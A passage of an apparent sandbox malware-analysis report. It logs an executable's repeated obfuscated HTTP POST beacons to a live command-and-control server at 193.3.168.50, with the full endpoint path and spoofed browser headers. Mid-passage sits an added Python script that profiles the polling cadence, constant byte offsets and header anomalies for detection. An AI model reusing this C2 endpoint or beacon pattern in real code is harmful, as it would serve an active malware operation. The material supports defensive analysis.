User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:54:17.502710104 CET | 1060 | OUT | Data Raw: 5f 5e 5f 5c 59 5c 5f 54 5a 58 51 52 55 54 5a 59 50 5e 5d 5a 59 5c 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _^_\Y\_TZXQRUTZYP^]ZY\WI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.;5_<'46%;,&4*$U-3<$7160-3"8T(-#G $],)
Dec 5, 2024 10:54:18.393225908 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:18.629383087 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49841 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:18.875300884 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:19.221476078 CET | 1060 | OUT | Data Raw: 5a 5d 5f 5c 5c 59 5a 52 5a 58 51 52 55 5f 5a 5b 50 5f 5d 5e 59 5b 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: Z]_\\YZRZXQRU_Z[P_]^Y[WI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.X8 (4 \,,!X 97,370<W#2!3=$! 0>=#G $],
Dec 5, 2024 10:54:20.113811970 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49842 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:20.155073881 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1936
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:20.502754927 CET | 1936 | OUT | Data Raw: 5f 5c 5a 59 59 58 5f 54 5a 58 51 52 55 51 5a 5f 50 53 5d 5f 59 5f 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _\ZYYX_TZXQRUQZ_PS]_Y_WA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/#!?_4]#%>\8: (-'Y%,$R 5$>+!4W*-#G $],=
Dec 5, 2024 10:54:21.393438101 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:21.629386902 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 39 38 0d 0a 09 11 25 12 30 05 3b 0a 24 2c 2c 0b 3c 33 01 07 39 20 3b 5f 24 2e 3d 0b 31 14 02 0f 3d 39 34 04 36 3e 2e 10 3f 3a 2f 1e 28 19 34 56 2a 12 20 58 00 1a 26 5c 23 54 3c 5b 2e 00 33 05 26 3d 0b 04 26 2d 07 5f 29 17 30 0e 3e 0d 12 57 25 2e 03 0f 29 20 2a 0d 2d 24 0b 58 39 00 04 58 25 05 2a 52 0e 17 21 1b 29 00 0e 59 37 22 36 0e 29 21 0e 04 2b 2c 27 1f 33 3b 32 54 23 3e 22 0c 27 23 21 55 30 21 2a 55 27 38 3b 5a 25 59 33 00 2a 13 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 98%0;$,,<39 ;_$.=1=946>.?:/(4V* X&\#T<[.3&=&-_)0>W%.) *-$X9X%*R!)Y7"6)!+,'3;2T#>"'#!U0!*U'8;Z%Y3* _. W1WT0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49844 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:20.276611090 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:20.627729893 CET | 1060 | OUT | Data Raw: 5f 5b 5a 58 5c 59 5f 52 5a 58 51 52 55 56 5a 58 50 5e 5d 5c 59 52 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _[ZX\Y_RZXQRUVZXP^]\YRWA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-;-<977.,,-Z49:]3 7^'-<@6 0)=#G $],!
Dec 5, 2024 10:54:21.515396118 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:21.749331951 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49849 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:22.000765085 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:54:22.346514940 CET | 1060 | OUT | Data Raw: 5f 5f 5f 52 5c 5c 5a 53 5a 58 51 52 55 54 5a 59 50 57 5d 5e 59 5c 57 43 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: ___R\\ZSZXQRUTZYPW]^Y\WC^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.Y,=<) %"_,Z%!* S:;3?0W49$,@!0S)#G $],)
Dec 5, 2024 10:54:23.239417076 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:23.473486900 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0
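Sessions 43 to 51 above are one polling loop: same host, same path, same request headers, bodies of only a few sizes, and a fixed chunked reply for most of them. The following Python script is an added example and is not part of the Joe Sandbox report; its input is constructed from the dumps above (the POST timestamp of each session, its Content-Length, and the first 40 bytes of its body, copied as printed). It computes what an analyst wants before attempting to decode the body: the request cadence, the body offsets that never change between requests, the byte range of the body, and the request-header tells. The header check relies on the fact that browsers do not send Expect: 100-continue while .NET's HttpWebRequest adds it to POSTs by default, so a body posted with that header under a browser User-Agent (here one claiming Opera 81) did not come from a browser.

```python
import re
from datetime import datetime, timedelta
from statistics import median

# Constructed input copied from the session dumps above: for sessions 43-51 the
# POST timestamp as printed, the announced Content-Length and the first 40 bytes
# of the raw body. Host, path and request headers are identical in every session.
C2_HOST = "193.3.168.50"
C2_PATH = ("/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/"
           "SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/"
           "linebigloadprivate.php")
REQUEST_HEADERS = {
    "Content-Type": "application/octet-stream",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60",
    "Host": C2_HOST,
    "Expect": "100-continue",
}
SESSIONS = [  # (session id, timestamp, Content-Length, first 40 body bytes)
    (43, "Dec 5, 2024 10:54:13.546973944 CET", 1908,
     "5a 59 5a 5c 59 5d 5a 52 5a 58 51 52 55 51 5a 53 50 51 5d 53 59 5d 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e"),
    (44, "Dec 5, 2024 10:54:13.669290066 CET", 1060,
     "5f 50 5f 59 59 58 5a 51 5a 58 51 52 55 54 5a 5e 50 51 5d 53 59 59 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e"),
    (45, "Dec 5, 2024 10:54:15.388012886 CET", 1060,
     "5f 5e 5f 53 59 5f 5f 50 5a 58 51 52 55 51 5a 53 50 5e 5d 5a 59 53 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e"),
    (46, "Dec 5, 2024 10:54:17.154334068 CET", 1060,
     "5f 5e 5f 5c 59 5c 5f 54 5a 58 51 52 55 54 5a 59 50 5e 5d 5a 59 5c 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e"),
    (47, "Dec 5, 2024 10:54:18.875300884 CET", 1060,
     "5a 5d 5f 5c 5c 59 5a 52 5a 58 51 52 55 5f 5a 5b 50 5f 5d 5e 59 5b 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e"),
    (48, "Dec 5, 2024 10:54:20.155073881 CET", 1936,
     "5f 5c 5a 59 59 58 5f 54 5a 58 51 52 55 51 5a 5f 50 53 5d 5f 59 5f 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e"),
    (49, "Dec 5, 2024 10:54:20.276611090 CET", 1060,
     "5f 5b 5a 58 5c 59 5f 52 5a 58 51 52 55 56 5a 58 50 5e 5d 5c 59 52 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e"),
    (50, "Dec 5, 2024 10:54:22.000765085 CET", 1060,
     "5f 5f 5f 52 5c 5c 5a 53 5a 58 51 52 55 54 5a 59 50 57 5d 5e 59 5c 57 43 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e"),
    (51, "Dec 5, 2024 10:54:23.746857882 CET", 1056,
     "5f 5b 5f 52 5c 5e 5f 55 5a 58 51 52 55 57 5a 59 50 57 5d 5c 59 5e 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e"),
]

TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) \w+$")


def parse_timestamp(text):
    """Parse the report's 'Dec 5, 2024 10:54:13.546973944 CET' form. strptime's %f
    accepts at most six fractional digits, so the nanosecond fraction is truncated
    to microseconds and added separately; the zone label is dropped."""
    m = TS_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    micros = int(m.group(2)[:6].ljust(6, "0"))
    return base + timedelta(microseconds=micros)


def request_intervals(sessions):
    """Seconds between consecutive POSTs, ordered by send time."""
    stamps = sorted(parse_timestamp(s[1]) for s in sessions)
    return [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]


def beacon_summary(sessions):
    """Cadence and body sizes: a tight median interval with a handful of distinct
    Content-Lengths is the shape of a polling loop, not of a user browsing."""
    gaps = request_intervals(sessions)
    return {
        "requests": len(sessions),
        "median_interval_s": median(gaps),
        "min_interval_s": min(gaps),
        "distinct_lengths": sorted({s[2] for s in sessions}),
    }


def fixed_byte_positions(hex_bodies):
    """Offsets at which every body carries the same byte. A constant region inside
    supposedly opaque data is where to start when recovering the encoding, since
    it normally holds a static field that is sent on every request."""
    bodies = [bytes.fromhex(h) for h in hex_bodies]
    width = min(len(b) for b in bodies)
    return [i for i in range(width) if len({b[i] for b in bodies}) == 1]


def body_byte_range(hex_bodies):
    """Smallest and largest byte value seen. A narrow printable range rules out
    output of a real cipher, whose bytes would be spread over 0x00-0xff."""
    data = b"".join(bytes.fromhex(h) for h in hex_bodies)
    return min(data), max(data)


def header_anomalies(headers):
    """Request-level tells that need no knowledge of the body encoding."""
    reasons = []
    ua = headers.get("User-Agent", "")
    if headers.get("Expect", "").lower() == "100-continue" and ua.startswith("Mozilla/"):
        reasons.append("browser User-Agent with Expect: 100-continue "
                       "(browsers do not send it; .NET HttpWebRequest adds it by default)")
    if headers.get("Content-Type") == "application/octet-stream" and ua.startswith("Mozilla/"):
        reasons.append("browser User-Agent posting raw application/octet-stream")
    return reasons


if __name__ == "__main__":
    bodies = [s[3] for s in SESSIONS]
    print("endpoint:", C2_HOST + C2_PATH)
    print(beacon_summary(SESSIONS))
    print("fixed offsets:", fixed_byte_positions(bodies))
    print("byte range: 0x%02x-0x%02x" % body_byte_range(bodies))
    for reason in header_anomalies(REQUEST_HEADERS):
        print("anomaly:", reason)
```

On the nine sessions the median gap is about 1.72 s, with two pairs of connections (43/44 and 48/49) opened roughly 0.12 s apart, which matches a timer-driven loop that occasionally issues two requests back to back. Of the first 40 body bytes, 26 offsets are identical in every request: offsets 8 to 22 alternate fixed and variable bytes, and offsets 24 to 39 are one constant run. The page gives no decoding for the body, so the script only locates that structure; every byte in the sampled region lies between 0x41 and 0x5f, which is consistent with a byte-wise transform of text rather than real ciphertext.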


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49855 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:23.746857882 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1056
Expect: 100-continue
Dec 5, 2024 10:54:24.096457005 CET | 1056 | OUT | Data Raw: 5f 5b 5f 52 5c 5e 5f 55 5a 58 51 52 55 57 5a 59 50 57 5d 5c 59 5e 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _[_R\^_UZXQRUWZYPW]\Y^WB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\._8(9$46&Z/ *?9$,T!"6'> B"V S>=#G $],-
Dec 5, 2024 10:54:24.985985994 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:25.221291065 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49861 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:25.462532997 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:25.815372944 CET | 1060 | OUT | Data Raw: 5f 50 5f 5d 5c 5b 5f 52 5a 58 51 52 55 56 5a 5b 50 55 5d 5c 59 5e 57 45 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _P_]\[_RZXQRUVZ[PU]\Y^WE^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.8 *?# ^;,- - 40T71!Z$<D##;(-#G $],!
Dec 5, 2024 10:54:26.700790882 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49863 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:26.764516115 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1936
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:27.112154961 CET | 1936 | OUT | Data Raw: 5f 51 5f 58 59 57 5f 50 5a 58 51 52 55 5f 5a 59 50 52 5d 52 59 52 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _Q_XYW_PZXQRU_ZYPR]RYRWB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.^-05_(9#9/<% 7:%,07T5Z3,@!+)#G $],
Dec 5, 2024 10:54:28.002809048 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:28.237238884 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 39 38 0d 0a 09 11 25 1d 27 38 3c 57 24 2c 2f 1a 28 23 3c 59 2d 0d 27 11 27 00 29 0b 31 5c 34 0a 3e 04 28 01 21 2e 31 03 29 39 0a 0b 3f 0e 3f 0e 29 28 20 58 00 1a 25 06 37 32 2c 11 2e 17 2f 01 24 2d 32 5f 24 2e 3a 03 29 17 3f 52 3e 33 24 57 32 07 2a 50 29 33 0b 51 2d 24 00 05 39 07 2e 14 25 2f 2a 52 0e 17 21 57 2a 3e 06 59 37 08 21 13 3e 0f 2b 16 3c 2f 23 1e 26 2b 3d 0d 34 07 29 53 30 20 25 57 24 1c 0c 54 25 28 23 13 26 01 02 5a 29 29 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 98%'8<W$,/(#<Y-'')1\4>(!.1)9??)( X%72,./$-2_$.:)?R>3$W2*P)3Q-$9.%/*R!W*>Y7!>+</#&+=4)S0 %W$T%(#&Z)) _. W1WT0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49867 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:26.903601885 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1056
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:27.252861023 CET | 1056 | OUT | Data Raw: 5f 5f 5a 58 59 5b 5a 5e 5a 58 51 52 55 57 5a 59 50 56 5d 52 59 52 57 44 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: __ZXY[Z^ZXQRUWZYPV]RYRWD^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\., ^+8#*\8>#R,#<$$S7!Z$.<5*#G $],-
Dec 5, 2024 10:54:28.141382933 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:28.373301029 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49869 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:28.663238049 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:54:29.018651962 CET | 1060 | OUT | Data Raw: 5f 5f 5f 5c 5c 5e 5a 56 5a 58 51 52 55 5f 5a 5f 50 53 5d 53 59 52 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: ___\\^ZVZXQRU_Z_PS]SYRWB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-;0=]?_#466]81[ ;-8'<<V7)X$8E##?)#G $],
Dec 5, 2024 10:54:29.900537014 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:30.133487940 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49875 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:30.373761892 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
